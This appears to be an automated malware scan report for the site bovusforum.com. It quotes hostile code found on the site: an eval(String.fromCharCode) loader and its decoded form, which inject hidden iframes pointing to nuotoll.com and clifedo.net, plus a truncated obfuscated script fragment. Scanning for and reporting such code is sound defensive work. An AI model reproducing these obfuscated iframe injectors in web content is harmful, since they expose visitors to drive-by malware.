Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bovusforum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://bovusforum.com/ | 200 OK Content-Length: 4549 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nuotoll.com eval(String.fromCharCode(118,97,114,32,120,101,119,61,52,53,51,56,48,48,53,52,51,59,118,97,114,32,103,104,103,52,53,61,34,110,117,111,116,34,59,118,97,114,32,119,61,34,111,34,59,118,97,114,32,114,101,54,61,34,108,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,118,97,114,32,106,104,114,52,61,52,51,50,52,50,50,52)) Decoded script: var xew=453800543;var ghg45="nuot";var w="o";var re6="ll.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); var jhr4=4324224 var xew=453800543;var ghg45="nuot";var w="o";var re6="ll.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); var jhr4=4324224 <iframe src="http://nuotoll.com/" width="1" height="3"></iframe> Malicious iFrame found. size: 1x1 style: hidden src: http://clifedo.net/?click=7a0696 This URL is marked by Google as suspicious <iframe src="http://clifedo.net/?click=7a0696" width=1 height=1 style="visibility:hidden;position:absolute"> | ||
http://bovusforum.com/test404page.js | 404 Not Found Content-Length: 2437 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var y3Tm='v&61&72&20a&3d&22&53cr&69ptEn&67ine&22&2c&62&3d&22Ve&72si&6fn(&29+&22&2c&6a&3d&22&22&2cu&3d&6ea&76igator&2euserA&67ent&3b&69&66(&28u&2e&69&6ed&65x&4f&66(&22Win&22)&3e0&29&26&26&28u&2eindexO&66(&22NT&20&36&22)&3c0&29&26&26(do&63ument&2eco --> Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bovusforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 05:16:14 GMT
Accept-Ranges: bytes
ETag: "27d90b-11c5-4e57b10c3649e"
Server: Apache
Content-Length: 4549
Content-Type: text/html
Last-Modified: Tue, 03 Sep 2013 13:57:11 GMT
...4549 bytes of data.
GET / HTTP/1.1
Host: bovusforum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 05:16:14 GMT
Accept-Ranges: bytes
ETag: "27d90b-11c5-4e57b10c3649e"
Server: Apache
Content-Length: 4549
Content-Type: text/html
Last-Modified: Tue, 03 Sep 2013 13:57:11 GMT
...4549 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bovusforum.com
Referer: http://www.google.com/search?q=bovusforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bovusforum.com
Referer: http://www.google.com/search?q=bovusforum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.